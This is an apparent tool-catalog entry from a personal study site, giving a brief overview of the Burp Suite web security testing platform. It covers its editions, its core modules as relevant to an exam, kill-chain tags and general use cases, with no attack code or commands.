Thiago Teixeira
EN | PT

Burp Suite

PortSwigger

Leading web application security testing platform with intercepting proxy and scanner.

Vulnerability Management Freemium Platform / Suite Learning Cross-platform
Homepage Docs

Cyber Kill Chain & Defender Lifecycle

Attacker — Kill Chain
1 Reconnaissance
2 Weaponization
3 Delivery
4 Exploitation
5 Installation
6 Command & Control
7 Actions on Objectives
Defender — IR Lifecycle
8 Detection / Monitoring
9 Containment & Eradication
10 Post-incident Forensics

Description

Burp Suite (PortSwigger) is the dominant web application security testing platform. The free Community edition gives you Proxy, Repeater, Decoder, Comparer; Professional adds the active scanner and Intruder at full speed.

Core tools relevant to the exam:

  • Proxy — intercept and modify HTTP(S) traffic between browser and server.
  • Repeater — replay and tweak a single request.
  • Intruder — automated payload-based attacks (fuzzing, brute-force).
  • Scanner (Pro) — automated detection of OWASP Top 10 issues.
  • Collaborator (Pro) — out-of-band detection for blind XXE/SSRF.

Use cases

  • Manual web app pentesting
  • Validating fixes for OWASP Top 10 findings
  • API security testing against JSON/REST endpoints
  • Decoding and tampering with JWT and session tokens